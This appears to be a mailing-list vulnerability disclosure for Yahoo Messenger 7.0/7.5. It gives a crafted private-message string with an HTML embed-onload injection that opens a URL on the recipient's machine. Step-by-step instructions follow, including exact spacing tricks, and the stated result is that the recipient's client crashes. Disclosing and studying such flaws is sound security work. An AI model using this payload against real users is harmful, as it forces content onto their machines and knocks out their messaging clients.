 |
|
|
|
Hi,
I found an another vulnerability in yahoo messenger that if you receive a Private message with this string helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-
)?@+#@;?(msg:---------------------------------------------<embed onload=window.open('http:\\\\google.
com/')>helomsg:+)-
(%/?#()(=(/;_@#~$(@;+?/(?#@@*-
)?@+#@;?(msg:---------------------------------------------<embed onload=window.open('http:\\\\google.
com/')>helomsg:+)-
(%/?#()(=(/;_@#~$(@;+?/(?#@@*-
)?@+#@;?(Yahoo messenger open in this case google.com in the internet explorer in the remote victim.
Yahoo messenger bug proof of concept:
1. Open messenger and log it.
2. Open a yahoo chat third party like yahelite through Ymsgr protocol and log it with another account.
3. Send a Pm to the messenger account with this string: s: helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-
)?@+#@;?(msg:---------------------------------------------<embed onload=window.open('http:\\\\google.
com/')>helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-
)?@+#@;?(msg:---------------------------------------------<embed onload=window.open('http:\\\\google.
com/')>helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-
)?@+#@;?(
4. The remote user will crash closing down her messenger.
Note: "helomsg :" this space must be created with alt+0160 and this "s: " with a space
s:[space]helomsg[alt+0160]:+)-
(%/?#()(=(/;_@#~$(@;+?/(?#@@*-
)?@+#@;?(msg:---------------------------------------------<embed onload=window.open('http:\\\\google.
com/')>helomsg[alt+0160]:+)-
(%/?#()(=(/;_@#~$(@;+?/(?#@@*-
)?@+#@;?(msg:---------------------------------------------<embed onload=window.open('http:\\\\google.
com/')>helomsg[alt+0160]:+)-
(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(
Tested in yahoo messenger 7.0/7.5
Regards
---------------------------------
Pregunta. Responde. Descubri.
Todo lo que querias saber, y lo que ni imaginabas,
esta en Yahoo! Respuestas (Beta).
Probalo ya!
|
|
|
|
|
|
|
|
